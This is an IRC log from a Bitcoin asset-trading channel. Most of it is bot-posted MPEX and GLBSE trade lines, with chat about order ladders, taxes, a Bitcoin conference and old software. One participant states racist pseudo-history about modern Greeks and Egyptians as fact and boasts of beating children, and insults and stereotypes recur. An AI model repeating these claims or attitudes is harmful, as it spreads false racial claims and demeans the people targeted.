1.6847 BTC [+] Sep 15 22:42:19 [MPEX] [S.MPOE] 61437 @ 0.00040115 = 24.6455 BTC [+] Sep 15 22:42:20 [MPEX] [S.MPOE] 3605 @ 0.00040116 = 1.4462 BTC [+] Sep 15 22:42:21 [MPEX] [S.MPOE] 49000 @ 0.00040156 = 19.6764 BTC [+] Sep 15 22:42:22 [MPEX] [S.MPOE] 41600 @ 0.00040167 = 16.7095 BTC [+] Sep 15 22:42:23 [MPEX] [S.MPOE] 19200 @ 0.00040172 = 7.713 BTC [+] Sep 15 22:42:24 [MPEX] [S.MPOE] 52062 @ 0.00040183 = 20.9201 BTC [+] Sep 15 22:42:24 [MPEX] [S.MPOE] 17396 @ 0.00040196 = 6.9925 BTC [+] Sep 15 22:42:25 [MPEX] [S.MPOE] 17400 @ 0.00040206 = 6.9958 BTC [+] Sep 15 22:42:26 [MPEX] [S.MPOE] 31400 @ 0.00040208 = 12.6253 BTC [+] Sep 15 22:42:27 [MPEX] [S.MPOE] 11599 @ 0.00040223 = 4.6655 BTC [+] Sep 15 22:42:28 [MPEX] [S.MPOE] 28000 @ 0.00040236 = 11.2661 BTC [+] Sep 15 22:42:29 [MPEX] [S.MPOE] 22800 @ 0.00040242 = 9.1752 BTC [+] Sep 15 22:42:30 [MPEX] [S.MPOE] 4400 @ 0.0004025 = 1.771 BTC [+] Sep 15 22:42:31 [MPEX] [S.MPOE] 54800 @ 0.00040263 = 22.0641 BTC [+] Sep 15 22:42:33 [MPEX] [S.MPOE] 12700 @ 0.00040284 = 5.1161 BTC [+] Sep 15 22:42:33 [MPEX] [S.MPOE] 56134 @ 0.00040285 = 22.6136 BTC [+] Sep 15 22:42:34 [MPEX] [S.MPOE] 25600 @ 0.00040346 = 10.3286 BTC [+] Sep 15 22:42:35 [MPEX] [S.MPOE] 7300 @ 0.00040362 = 2.9464 BTC [+] Sep 15 22:42:36 [MPEX] [S.MPOE] 55900 @ 0.00040383 = 22.5741 BTC [+] Sep 15 22:42:37 [MPEX] [S.MPOE] 44100 @ 0.00040387 = 17.8107 BTC [+] Sep 15 22:42:38 [MPEX] [S.MPOE] 46100 @ 0.00040406 = 18.6272 BTC [+] Sep 15 22:42:39 [MPEX] [S.MPOE] 30800 @ 0.00040426 = 12.4512 BTC [+] Sep 15 22:42:40 [MPEX] [S.MPOE] 41200 @ 0.00040459 = 16.6691 BTC [+] Sep 15 22:42:41 [MPEX] [S.MPOE] 1298 @ 0.00040583 = 0.5268 BTC [+] Sep 15 22:46:36 hahaaa! teh lord takekh and teh lord giveth backeth. Sep 15 22:49:10 I see nothing wrong with it Sep 15 22:49:33 it's pretty standard practice to make a ladder of orders Sep 15 22:50:00 I think it's like mtgox, where if your order for X crosses 100 small orders during execution, all of them get reported Sep 15 22:51:34 copumpkin ? Sep 15 22:51:59 mircea_popescu: does MPEX report a separate trade for all orders crossed? Sep 15 22:52:09 nope Sep 15 22:52:10 that would explain them coming in batches and being comparatively small Sep 15 22:52:13 what would be the point of that ? Sep 15 22:52:39 [GLBSE] [NYAN.C] 3 @ 0.35 = 1.05 BTC [+] Sep 15 22:52:43 well, if you report the aggregate active order, you need to talk about the average price it executed at Sep 15 22:52:57 reporting smaller crossed orders can be exact Sep 15 22:53:04 but in principle this is something that the aggregators do. Sep 15 22:53:12 mpex furnishes the raw data. Sep 15 22:53:17 [GLBSE] [FDBF] 2 @ 0.15 = 0.3 BTC [+] Sep 15 22:53:40 o wait. is some idiot on my ignore list being an ass ? Sep 15 22:54:06 assbot is being an ass! Sep 15 22:54:09 lol Sep 15 22:54:38 lettuce point out to the anonymous yet random idiot that a second ago that dubious tyger-p-whatever DID THE EXACT SAME THING Sep 15 22:54:52 albeit on a scale more adequate to the failure that is glbbq, which is to say 100th Sep 15 22:55:15 Smoovious: what's wrong with that? Sep 15 22:55:33 if you're not going to let people take fractional shares, having lots of small shares is almost as good :) Sep 15 22:55:40 Smoovious: it's more efficient ;) Sep 15 22:56:17 it's incredible these people. they do something WRONG because they are INCOMPETENT. then they get used to it. then when somebody does it right they whine. Sep 15 22:56:32 you don't belong on the internet, get off it. Sep 15 22:56:52 Smoovious: what's wrong with having loads of tiny shares? Sep 15 22:57:18 that's what I was saying is more efficient Sep 15 22:58:03 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 15 22:58:29 say you have some criterion for picking an optimal portfolio, and the optimal portfolio wants 1.3 shares of BRK-A Sep 15 22:58:37 (BRK-A shares cost $130k each) Sep 15 22:58:47 you can't do that, because you don't have fractional shares Sep 15 22:58:53 so you either need to have too much BRK-A, or too little Sep 15 22:59:10 heh Sep 15 22:59:20 you make an excellent argument and I concede Sep 15 22:59:44 [GLBSE] [FPGAMINING] 9 @ 0.6549 = 5.8941 BTC [+] Sep 15 22:59:45 [GLBSE] [FPGAMINING] 8 @ 0.655 = 5.24 BTC [+] Sep 15 22:59:46 [GLBSE] [FPGAMINING] 20 @ 0.697699 = 13.954 BTC [+] Sep 15 22:59:48 [GLBSE] [FPGAMINING] 30 @ 0.6977 = 20.931 BTC [+] Sep 15 22:59:49 [GLBSE] [FPGAMINING] 3 @ 0.69998 = 2.0999 BTC [+] Sep 15 23:00:55 i like to make sure the books on the shelf are listed by library of congress number Sep 15 23:01:23 crazy ocd person! Sep 15 23:01:59 you're a statist! Sep 15 23:03:27 [GLBSE] [PIMP] 100 @ 0.101 = 10.1 BTC [-] Sep 15 23:03:29 [GLBSE] [PIMP] 100 @ 0.1 = 10 BTC [-] Sep 15 23:03:53 that's insane Sep 15 23:03:59 stop breathing my oxygen Sep 15 23:04:56 I need more assets... who's selling DMC? Sep 15 23:05:06 or anything else for that matter Sep 15 23:05:17 BTC-Mining i seriously doubt anyone holds dmc outside of the people he traded assets with. Sep 15 23:05:32 but otherwise, have some s.dice. Sep 15 23:05:52 eh, how far are they by now Sep 15 23:06:47 far ? Sep 15 23:06:55 !ticker s.dice Sep 15 23:06:57 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (8000 shares, 27.20 BTC), 30day: 0.0032 / 0.00329454 / 0.0034 (4637641 shares, 15,278.91 BTC) Sep 15 23:09:03 [MPEX] [F.GIGA.ETF] 900 @ 0.00043545 = 0.3919 BTC [-] Sep 15 23:09:05 [MPEX] [F.GIGA.ETF] 11500 @ 0.00042821 = 4.9244 BTC [-] Sep 15 23:09:05 [MPEX] [F.GIGA.ETF] 1000 @ 0.00042665 = 0.4267 BTC [-] Sep 15 23:09:06 [MPEX] [F.GIGA.ETF] 7774 @ 0.00042487 = 3.3029 BTC [-] Sep 15 23:09:07 [MPEX] [F.GIGA.ETF] 3271 @ 0.00042197 = 1.3803 BTC [-] Sep 15 23:09:09 [MPEX] [F.GIGA.ETF] 555 @ 0.00041616 = 0.231 BTC [-] Sep 15 23:09:46 [GLBSE] [BITCOINMINV] 74 @ 0.12999 = 9.6193 BTC [+] Sep 15 23:10:42 Still 4 million at 0.0034 Sep 15 23:10:54 Wasn't the new design supposed to be out already? Sep 15 23:12:34 mmm maybe. Sep 15 23:13:56 Kick evoorhees for me. Tell him to have the new design ready already. Sep 15 23:14:23 lol. i hate new designs. Sep 15 23:14:41 if i were to kick him for something, it'd be to never change it in the first place. Sep 15 23:18:38 GIGAMINING passthrough on MPEX Sep 15 23:18:56 ~ 0.42 on MPEX Sep 15 23:20:19 [MPEX] [S.BVPS] 194 @ 0.0030505 = 0.5918 BTC [-] Sep 15 23:20:51 [GLBSE] [OBSI.HRPT] 5 @ 0.1 = 0.5 BTC [+] Sep 15 23:23:56 [GLBSE] [GSDPT] 25 @ 0.00339999 = 0.085 BTC [-] Sep 15 23:23:58 [GLBSE] [GSDPT] 475 @ 0.0033999 = 1.615 BTC [-] Sep 15 23:28:55 Arf, I need to find a good deal somewhere Sep 15 23:30:16 lol now that diablo's gone ? Sep 15 23:36:30 [GLBSE] [MOORE] 2 @ 0.495 = 0.99 BTC [+] Sep 15 23:39:47 Anyone need to dump anything? Sep 15 23:46:17 Oh oh! Sep 15 23:46:28 pink white blue black market implemented Sep 15 23:46:55 with default market page not including black market assets Sep 15 23:47:03 [MPEX] [F.GIGA.ETF] 3825 @ 0.00041616 = 1.5918 BTC [-] Sep 15 23:47:39 and all pirate/scam/gone issuer assets are in black market it seems Sep 15 23:49:19 I'm now back in the top 20 of traded assets Sep 15 23:50:19 wd Sep 15 23:51:17 [GLBSE] [GIGAMINING] 1 @ 0.665889 BTC [-] Sep 15 23:52:46 [GLBSE] [OBSI.HRPT] 5 @ 0.1 = 0.5 BTC [+] Sep 15 23:53:50 [GLBSE] [SYNERGY] 1 @ 0.162998 BTC [-] Sep 15 23:55:56 [GLBSE] [GSDPT] 3 @ 0.0033999 = 0.0102 BTC [-] Sep 15 23:57:16 [GLBSE] [OBSI.HRPT] 77 @ 0.1 = 7.7 BTC [+] Sep 15 23:59:24 [GLBSE] [NASTY] 1 @ 0.5553 BTC [+] Sep 15 23:59:40 [GLBSE] [IBB] 1 @ 0.5897 BTC [-] Sep 16 00:02:58 [GLBSE] [OBSI.HRPT] 21 @ 0.1 = 2.1 BTC [+] Sep 16 00:03:36 [GLBSE] [MERGEDMINING] 4 @ 0.07997 = 0.3199 BTC [-] Sep 16 00:06:14 conference Sep 16 00:06:15 is Sep 16 00:06:19 awesome Sep 16 00:09:02 I would have gone but I am racing a 24h race in spa-francorchamps Sep 16 00:09:16 [GLBSE] [BITCOINRS] 41 @ 0.048 = 1.968 BTC [-] Sep 16 00:13:16 I'm not sure if that sounds fun or not Sep 16 00:13:52 [GLBSE] [007] 6 @ 0.115 = 0.69 BTC [+] Sep 16 00:15:24 [GLBSE] [BIB.BVPS] 95 @ 0.00445 = 0.4228 BTC [-] Sep 16 00:16:58 [MPEX] [F.GIGA.ETF] 6746 @ 0.00041616 = 2.8074 BTC [-] Sep 16 00:17:00 [MPEX] [F.GIGA.ETF] 3400 @ 0.00041282 = 1.4036 BTC [-] Sep 16 00:17:01 [MPEX] [F.GIGA.ETF] 554 @ 0.00040028 = 0.2218 BTC [-] Sep 16 00:20:04 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Sep 16 00:20:21 nefario Sep 16 00:20:29 I see the new black market is implemented Sep 16 00:20:36 hi Sep 16 00:20:39 ye Sep 16 00:20:42 yes Sep 16 00:21:10 How about styling those tabs at the top? There's the thin white/red/blue/black buttons you could make into a bar. Sep 16 00:21:29 That was kind of a rush job Sep 16 00:21:37 I had them in a table Sep 16 00:21:45 but it spilled over into 2 lines Sep 16 00:22:12 Make it a menu with those four colors from the bootstrap buttons, using the smallest format Sep 16 00:22:19 should make a nice bar Sep 16 00:22:37 [GLBSE] [007] 9 @ 0.12 = 1.08 BTC [+] Sep 16 00:23:05 oh right Sep 16 00:23:08 good idea Sep 16 00:23:17 thanks for the suggestion Sep 16 00:23:21 [GLBSE] [PPT.A] 42 @ 0.32 = 13.44 BTC [+] Sep 16 00:24:17 [GLBSE] [PPT.B] 144 @ 0.32 = 46.08 BTC [+] Sep 16 00:27:03 [MPEX] [B.MPCD.B] 85000 @ 0.001017 = 86.445 BTC [+] Sep 16 00:27:04 [MPEX] [B.MPCD.B] 15000 @ 0.00101735 = 15.2603 BTC [+] Sep 16 00:28:59 [GLBSE] [NYAN.B] 2 @ 0.989 = 1.978 BTC [-] Sep 16 00:32:06 [GLBSE] [SS] 28 @ 0.025 = 0.7 BTC [+] Sep 16 00:34:21 !ticker FDBF Sep 16 00:34:27 [GLBSE:FDBF] [Bid: 0.147] [Ask: 0.15] [Spread: 0.003] [Last: 0.15] [24hVol: 5.242] [7dAvg: 0.14991836] Sep 16 00:35:49 I get a lot of mixed messages from this community. Sep 16 00:36:02 One day people will be calling me a troll and an idiot. Sep 16 00:36:19 The next I will receives PM from people wanting me to join their business venture. Sep 16 00:36:54 My conclusion? Most of the butthurt is from Europeans who hate an American capitalist attitude. Sep 16 00:37:08 http://i.imgur.com/Tg3MO.jpg Sep 16 00:37:19 Bane_Capital: have you been to europe? Sep 16 00:37:40 It's been a long time. Sep 16 00:37:43 but yes. Sep 16 00:38:08 so you were fully aware of that aspect of "european culture" while you were visting, a long time ago? Sep 16 00:38:22 No, I was not that informed at the time. Sep 16 00:38:30 Merely a child. Sep 16 00:38:42 whence comes your information on said european attitude then? Sep 16 00:39:04 Articles and other readings on their culture Sep 16 00:39:10 Skype calls Sep 16 00:39:18 General forum talk Sep 16 00:39:21 4chan Sep 16 00:39:22 etc. Sep 16 00:39:39 and I take it you make a point of seeking out articles from sources that might not necessarily reflect your political leanings and preconceived notions, right? Sep 16 00:39:42 Bane_Capital: "Europe" is not a country Sep 16 00:39:57 nor is there such thing as "european" cultchure Sep 16 00:40:03 nefario: You have no idea how much I support that statement. Sep 16 00:40:15 I am generalizing, yes Sep 16 00:40:29 but the cultures do have similarities Sep 16 00:40:58 Especially in terms of hierarchical and economic perspectives. Sep 16 00:41:04 Views on authority, if you will. Sep 16 00:41:19 take mircea_popescu, stereotypical european Sep 16 00:41:23 he dresses in tight clothing Sep 16 00:41:31 loves authority Sep 16 00:41:42 i love authority only inasmuch as it's indistinguishable from my own. Sep 16 00:41:44 what else is a european stereotype? Sep 16 00:41:46 He's of Eastern Europe Sep 16 00:42:07 I am speaking of typical countries that submitted to the Eurozone Sep 16 00:42:12 10% return on my S.MPOE trade today Sep 16 00:42:12 yesss Sep 16 00:42:16 aha Sep 16 00:42:18 4.5 BTC Sep 16 00:42:20 then you're talking about me! Sep 16 00:42:23 hehe wd. Sep 16 00:42:34 you're a stereotypical brit. Sep 16 00:42:43 you folks were not yet accepted into teh continent :D Sep 16 00:42:46 I know nothing then. I've just noticed Europeans hate my guts over my individualism. Sep 16 00:42:49 must lurk moar. Sep 16 00:43:04 pff, only 4.5 BTC Sep 16 00:43:06 Bane_Capital: not really in the UK Sep 16 00:43:11 Bane_Capital europeans don't hate your guts, and it's not over your individualism, it's over your parading ignorance. Sep 16 00:43:21 You should trade more S.MPOE Sep 16 00:43:37 mircea_popescu: Well, I wish people would educate me instead of just beating on me. Sep 16 00:43:47 this is how we educate kids in europe Sep 16 00:43:50 It was a once in a lifetime opportunity Sep 16 00:43:51 it's not really our responsibility to educate you Sep 16 00:43:55 we beat the shit out of them. i do it to girls, others do it to boys Sep 16 00:43:56 we can point it out :) Sep 16 00:43:57 it's a lovely system. Sep 16 00:44:06 I bought all that was available below 36000 Sep 16 00:44:16 copumpkin: Then why bother attempting to have a discussion? Is the point not to share information? Sep 16 00:44:20 o hey, it dipped that low huh ? Sep 16 00:44:31 35000 Sep 16 00:44:37 copumpkin: or is the point to show each other how smart we are and circlejerk? Sep 16 00:44:40 100k went off at 35000 Sep 16 00:44:47 Bane_Capital: not really, but you can point out the sources of one's inadequate opinion and urge people to strive to diversify a bit Sep 16 00:44:56 Bugpowder well, good for you~ Sep 16 00:45:02 #WINNING Sep 16 00:45:03 mircea_popescu: are you not worried about the risk to mpex as an exchange because of your trading of options on mpoe? Sep 16 00:45:15 Yeah, is that firewalled? Sep 16 00:45:17 what risk do you see ? Sep 16 00:45:18 Bane_Capital: nah, I'm not all that interested in showing people how smart I am Sep 16 00:45:21 what happens if you become illiquid? Sep 16 00:45:30 and I already engaged in some hardcore circlejerking earlier today Sep 16 00:45:33 so I'm all spent Sep 16 00:45:36 copumpkin: Well, you are a good man. Sep 16 00:45:37 mpoe doesn't trade in my own name, there's bondholders financing it. Sep 16 00:45:41 I am not referring to you. Sep 16 00:45:48 oh okay, thanks :) Sep 16 00:45:51 but to some very load and bothered europeans on the forum. Sep 16 00:46:03 Very bothered people. Sep 16 00:46:03 I see. Is that 5% yield yearly or monthly (the bondholders) Sep 16 00:46:14 anyway, I might need to reassert my americanness after being so european on IRC, so I'm gonna go get a burger Sep 16 00:46:18 Bugpowder well currently it's unlimited, so it could be w/e they ask for Sep 16 00:46:27 burger with bacon Sep 16 00:46:35 copumpkin you see, this is why you brits aren't accepted on teh continent. you can't friggin decide WHICH ONE Sep 16 00:46:44 no, no, I'm italian! Sep 16 00:46:49 oh wait, I'm english Sep 16 00:46:51 fuck Sep 16 00:46:51 so eat a frog Sep 16 00:46:55 now I'm confused Sep 16 00:47:00 no I'm not french Sep 16 00:47:01 mircea_popescu: The Brits already had America but they lost that rather quickly. Sep 16 00:47:06 as long as you're not greek. Sep 16 00:47:17 does that count? Sep 16 00:47:23 Bane_Capital no. they just fucked over you naive bunch. you're more national socialist than they ever dared try. Sep 16 00:47:50 anyway, on that note Sep 16 00:47:54 mircea_popescu: The tax rates we would suffer as a long-term colony would not be fun. Sep 16 00:47:55 Smoovious: good idea! Sep 16 00:48:04 I might get some french fries with my Hamburg-er Sep 16 00:48:05 You guys pay over 50% in taxes. Sep 16 00:48:14 You fucking work for the government pretty much. Sep 16 00:48:18 Bane_Capital i seriously fail to see how the us would be more akin a british colony if there was a queen representative governing it outright. Sep 16 00:48:29 and i never paid more than 16%. Sep 16 00:48:36 in like 20 years. Sep 16 00:48:47 Capital gains? Sep 16 00:48:51 well yes. Sep 16 00:49:02 You're a higher class of Brit. Sep 16 00:49:07 i'm romanian. Sep 16 00:49:08 so yes. Sep 16 00:49:12 Hahjahaha Sep 16 00:49:36 Most lowly proletarians can't even figure what capital is much less pay taxes on it. Sep 16 00:49:52 so then let them work for the govt, they're lucky to have a job in the first place. Sep 16 00:49:53 http://en.wikipedia.org/wiki/File:MarginalIncomeTax.svg Sep 16 00:50:22 lol, he's sitting on 44% despising 50% ? Sep 16 00:50:35 nay, current top is 34 Sep 16 00:50:37 or 35 Sep 16 00:50:43 Look, I quit my job for a reason. Sep 16 00:50:45 plus state taxes, if you have them Sep 16 00:50:47 a my bad, 34 Sep 16 00:51:08 They withhold more than that Sep 16 00:51:22 anyway, burgertime :) Sep 16 00:51:23 ciao Sep 16 00:51:24 You end up getting less than 60% at the end. Sep 16 00:51:26 it wouldn't surprise me. the us has this recent history of lieing about everything Sep 16 00:51:27 ciao Sep 16 00:51:36 they do it with unemployment, why wouldn't they do it with the tax rate Sep 16 00:51:55 plus state taxes Sep 16 00:52:08 if you have a state income tax Sep 16 00:52:15 We don't have VAT Sep 16 00:52:16 yet Sep 16 00:52:19 When we do Sep 16 00:52:25 Things will suck hard Sep 16 00:52:49 but they won't implement that because people are already mad Sep 16 00:52:57 35% + Social Security + State. Sep 16 00:53:08 [MPEX] [F.GIGA.ETF] 3546 @ 0.00040028 = 1.4194 BTC [-] Sep 16 00:53:09 [MPEX] [F.GIGA.ETF] 4954 @ 0.0004 = 1.9816 BTC [-] Sep 16 00:53:13 State is 0-10% depending Sep 16 00:53:28 Smoovious: It hurts the poor the most. Sep 16 00:53:35 Yes, Atlas, cares about the poor. Sep 16 00:53:52 I, for one, admire the poor paying no taxes at all. Sep 16 00:54:36 all taxation should be voluntary. ancient greek style. Sep 16 00:54:40 Hmm, well, they do get the services. Sep 16 00:54:48 you have some spare cash, you can give it to a good govt cause. Sep 16 00:54:51 you don't, tough. Sep 16 00:55:08 mircea_popescu: What went wrong and formed the Greece we know today? Sep 16 00:55:25 migratory invasions. Sep 16 00:55:42 You know, most people would call that racist. Sep 16 00:55:46 but it's actually true. Sep 16 00:55:55 greeks today are about as similar to greeks as you're to a monkey. the classical greek is tall, curly, blond and blue eyed Sep 16 00:56:00 the current greek is some sort of turk. Sep 16 00:56:27 same thing with egyptians. if you look at classical egyptian statues they look nothing at all like the short stocky arabs calling themselves "egyptian" Sep 16 00:56:48 Smoovious: I agree but unfortunately that changed when property owners were considered the tools of anyone. Sep 16 00:57:08 LOL Sep 16 00:57:28 mircea_popescu: Maintaining a stable culture can make all the difference in the world. Sep 16 00:58:30 in general stable cultures flourish in inaccessible places. Sep 16 00:58:38 Smoovious: Yes, it's the angry man with the gun that makes things change but do you have the balls to be that man? Sep 16 00:59:01 Bane_Capital: why didn't you come to the conference? Sep 16 00:59:06 i do have the basll, and i have been that man, but otherwise the statement is wrong. Sep 16 00:59:12 angry people with guns change jack shit. Sep 16 00:59:14 nefario: I would of came if it was in December. Sep 16 00:59:21 oh well Sep 16 00:59:23 nefario : is anyone in this room at your conference doohickey ? Sep 16 00:59:25 missed ya Sep 16 00:59:34 nefario: I hope to meet you eventually. : ) Sep 16 00:59:41 was actually looking forward to meeting you Sep 16 00:59:50 Well I appreciate that. I do. Sep 16 00:59:53 I met someone who used to troll me on the forums over a year ago Sep 16 01:00:02 it was so funny Sep 16 01:00:05 i'm looking forward to somebody organising an actual conference. you know, invite people that matter in btc etc. Sep 16 01:00:14 nefario: Did he turn out different? : P Sep 16 01:01:20 he turned out to be a girl Sep 16 01:01:29 genjix's sister Sep 16 01:01:32 [GLBSE] [OBSI.HRPT] 21 @ 0.1 = 2.1 BTC [+] Sep 16 01:01:36 I can't get over that Sep 16 01:01:41 nefario: Hahaha Sep 16 01:01:44 Didn't know he had one Sep 16 01:01:49 at least on the forums Sep 16 01:01:55 lmao. so wait, you're all related there ? Sep 16 01:01:56 [GLBSE] [FUTUREFUND] 2 @ 0.00012682 = 0.0003 BTC [+] Sep 16 01:01:57 or in BTC in general lol Sep 16 01:02:30 [GLBSE] [HYDRO.BONDS] 1 @ 1.43 BTC [+] Sep 16 01:02:40 Also Sep 16 01:02:46 richard stallman came to speak Sep 16 01:02:55 nefario >> nefario : is anyone in this room at your conference doohickey ? << Sep 16 01:03:00 and he had free software foundation merchandise sent ahead Sep 16 01:03:18 there was a stuffed animal Sep 16 01:03:19 a gnu Sep 16 01:03:24 and someone walked off with it Sep 16 01:03:30 dude stop faking it, seriously. you, taaki and his sister showed up. nobody cares, fo reals. Sep 16 01:03:33 stallman seemed like he was going to cry Sep 16 01:03:48 mircea_popescu: you're losing your shit man Sep 16 01:03:53 !ticker GIGAMINING Sep 16 01:03:59 [GLBSE:GIGAMINING] [Bid: 0.63100001] [Ask: 0.665889] [Spread: 0.03488899] [Last: 0.665889] [24hVol: 229.87208779] [7dAvg: 0.60518783] Sep 16 01:04:02 no, my shit is safely stored with grubles and i trust him. Sep 16 01:04:04 nefario: :( Sep 16 01:04:08 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 16 01:04:18 God, I should of came Sep 16 01:04:21 I love Stallman Sep 16 01:04:30 Bane_Capital: I felt sorry for him Sep 16 01:04:35 Because he's hilarious. Sep 16 01:04:40 but I don't think the stolen gnu was malicious Sep 16 01:04:47 the stuff arrived in a box Sep 16 01:04:49 with no instructions Sep 16 01:04:58 and I think someone thought it was free Sep 16 01:05:37 someone was also selling casicius coins Sep 16 01:05:40 or however you spell it Sep 16 01:05:43 lol Sep 16 01:05:49 I can't even say it never mind spell it Sep 16 01:05:54 Bad name in general Sep 16 01:05:55 I couldn't find dead terra Sep 16 01:06:14 He'll see me speak tomorrow if he's there Sep 16 01:06:28 there were like 20 people who didn't come Sep 16 01:06:34 but had paid Sep 16 01:06:43 about 30 people paid cash Sep 16 01:07:05 :O Sep 16 01:07:15 the other 300 had pre-paid Sep 16 01:07:25 when max keiser came Sep 16 01:07:31 I said he looked tired Sep 16 01:07:37 the guy started shouting at me Sep 16 01:07:41 I was like Sep 16 01:07:41 Hahaha Sep 16 01:07:43 WTF Sep 16 01:07:48 I imagined that Sep 16 01:07:51 trolled me hard Sep 16 01:07:54 lols were had Sep 16 01:08:13 I am sure Keiser has a packed schedule Sep 16 01:08:19 I think RT runs on a shoe string budget Sep 16 01:09:11 eh, kinda Sep 16 01:09:11 we paid for his trip to the confence Sep 16 01:09:14 at least rt america does Sep 16 01:09:17 he's a speaker Sep 16 01:09:28 was so funny Sep 16 01:09:33 its funny, I cant stand max keisers show Sep 16 01:09:40 genjix went to pay stallman Sep 16 01:09:42 I mean, I respect the guy Sep 16 01:09:48 but jesus christ his show is horrible Sep 16 01:09:52 and stallman was like:wait a minute I'm speaking to this person Sep 16 01:10:05 so genjix just walked off with his money Sep 16 01:10:11 "fuck this Im not waiting" Sep 16 01:10:16 stallman started getting angry Sep 16 01:10:37 I had to go to the restaraunt and get the money, genjix had gone to eat Sep 16 01:10:41 was sooo Sep 16 01:10:45 lols Sep 16 01:10:47 Wait Sep 16 01:10:54 What was the money about? Sep 16 01:11:05 Kinda missed where the money came in Sep 16 01:11:24 [GLBSE] [SYNERGY] 46 @ 0.162998 = 7.4979 BTC [-] Sep 16 01:11:26 [GLBSE] [SYNERGY] 14 @ 0.162999 = 2.282 BTC [+] Sep 16 01:11:28 stallmans airline ticket re-imbursement Sep 16 01:11:32 Oh Sep 16 01:11:55 I think the loss of his gnu ruined his day Sep 16 01:12:01 so it's now just linux Sep 16 01:12:05 which pisses him off Sep 16 01:12:06 lol Sep 16 01:12:11 why the fuck did rms even show up Sep 16 01:12:19 [GLBSE] [SYNERGY] 1 @ 0.162999 BTC [+] Sep 16 01:12:26 he doesnt bother with small events anymore Sep 16 01:12:28 Diablo-D3 because by now not that many people can be bothered to invite him anywhere. Sep 16 01:13:21 I haven't even written my talk for tomorrow Sep 16 01:13:36 mircea_popescu: would you like me to mention you or mpex? Sep 16 01:14:01 no. Sep 16 01:14:24 Does RMS even like capitalistic things such as Bitcoin? : P Sep 16 01:14:31 I get the impression he is antimoney. Sep 16 01:14:52 well thebitcoin client is opensource Sep 16 01:14:55 as is the protocol Sep 16 01:15:06 and we have several OS people who were helping out Sep 16 01:15:26 So it makes sense in that department. I guess it could be his ideal money. Sep 16 01:15:35 [GLBSE] [BBBB] 5 @ 0.0002 = 0.001 BTC [+] Sep 16 01:15:36 Who knows what software produces US dollars Sep 16 01:15:38 and Euros Sep 16 01:15:39 and the like Sep 16 01:15:48 [GLBSE] [BBBB] 5 @ 0.0002 = 0.001 BTC [+] Sep 16 01:15:53 whatever it is Sep 16 01:15:58 its written in cobol Sep 16 01:16:02 I guarantee Sep 16 01:16:05 [GLBSE] [BBBB] 5 @ 0.0002 = 0.001 BTC [+] Sep 16 01:16:08 I think he is pro subverting the dominant paradigm Sep 16 01:16:11 fucking hate cobol Sep 16 01:16:23 Bugpowder: anti-popular Sep 16 01:16:23 >est 1959 Sep 16 01:16:24 WTF Sep 16 01:16:33 I dont even care anymore Sep 16 01:16:39 How does Cobol still exist? Sep 16 01:16:43 What compiles it? Sep 16 01:16:50 cobol compilers Sep 16 01:16:55 like they always have Sep 16 01:17:01 it exists because it costs money to replace Sep 16 01:17:06 and it works Sep 16 01:17:12 not perfectly but it does work Sep 16 01:17:47 God, it's such a cold language Sep 16 01:18:14 IDENTIFICATION DIVISION Sep 16 01:18:24 PROGRAM-ID. HELLO-WORLD Sep 16 01:18:29 I worked for bank of ireland Sep 16 01:18:31 PROCEDURE DIVISION Sep 16 01:18:41 fucking hate their IT systems Sep 16 01:18:47 still used NT4.5 Sep 16 01:18:52 or something like that Sep 16 01:19:03 [MPEX] [F.GIGA.ETF] 5200 @ 0.0003967 = 2.0628 BTC [-] Sep 16 01:19:04 only game we could play was original DOOM Sep 16 01:19:37 nefario: I think it really shows how it's all decaying. Sep 16 01:19:47 They are getting lazy. Sep 16 01:19:54 no they're not Sep 16 01:20:05 Well, I stand corrected. Sep 16 01:20:08 airlines are still using their booking systems from the 60's Sep 16 01:20:10 They are determined then? Sep 16 01:20:18 it's really messy to upgrade that shit Sep 16 01:20:23 mistakes are really expensive Sep 16 01:20:42 heh Sep 16 01:20:51 SABRE? Sep 16 01:20:54 I downloaded the doom I shareware off a bbs Sep 16 01:21:03 shortly after it came out Sep 16 01:21:05 I feel old Sep 16 01:22:12 nefario: So is our central banking system not bureaucratic, apathetic and stagnant? Sep 16 01:22:22 On a international basis that is. Sep 16 01:22:39 ask me when I work in a central bank Sep 16 01:22:46 heh Sep 16 01:22:54 if it exists, it exists to be disrupted Sep 16 01:22:58 these are the rules of the new world Sep 16 01:23:42 nefario: Fair enough. Sep 16 01:23:57 Diablo-D3 see this? http://release.blackmesasource.com/ Sep 16 01:23:59 It seems I have taken some of your statements out of their intended context and vice-versa. Sep 16 01:24:09 OneMiner: yes Sep 16 01:24:12 OneMiner: I just finished playing. Sep 16 01:24:17 I wanted to download it, but steam wont start in wine again Sep 16 01:24:19 Great piece of work right there. Sep 16 01:24:24 I'm gonna get me some of that! Sep 16 01:24:43 It's good to see Valve is confident enough to let it exist Sep 16 01:24:49 fuck valve Sep 16 01:24:51 linux this Sep 16 01:24:52 linux that Sep 16 01:24:55 why cant I apt-get it yet! Sep 16 01:25:32 Because you're a filthy neckbeard Sep 16 01:25:34 I'm kinda impressed with the work that's going into Linux gaming. I could change teams if they keep it up. Sep 16 01:25:55 OneMiner: You can thank Windows 8 for being a complete joke Sep 16 01:26:18 You can't even right click efficiently in Windows 8 Sep 16 01:26:35 Ya, I hear it's metro thingy isn't fun. It'll get patched. But a review said that games ran a bit faster. Sep 16 01:26:57 Not that I'm some uber gamer or something. It's just the only thing that really bogs down my system. Sep 16 01:28:06 windows 8 sucks its created for touchscreen apps Sep 16 01:28:28 You know, nobody ever really asked for a touch screen on their devices Sep 16 01:28:35 It was kind of pushed upon us Sep 16 01:28:54 We eventually accepted it for portable applications because it made some things easier Sep 16 01:29:02 but for desktops? Sep 16 01:29:15 It does absolutely nothing besides annoy people. Sep 16 01:29:33 it is really not a good system for desktops, use win 7 64 instead or a linux version Sep 16 01:29:37 Ya no good for desktops. I want to speak to my computer already. Computer, download something, load bla, ect. Sep 16 01:29:51 Then I'll shout at it all the time. Sep 16 01:30:15 system overload ;) Sep 16 01:31:46 mircea_popescu: Is the Day/Mon volume that is reported for current calendar month, or like past 30 days? Sep 16 01:32:17 past 30 days Sep 16 01:32:22 rolling windo Sep 16 01:32:49 Oh no, this game is going to fill my HDD to the limit, system overload is right! Sep 16 01:33:07 OneMiner get a 2tb hdd, they're cheap. Sep 16 01:33:21 Ugh, I need so many other things 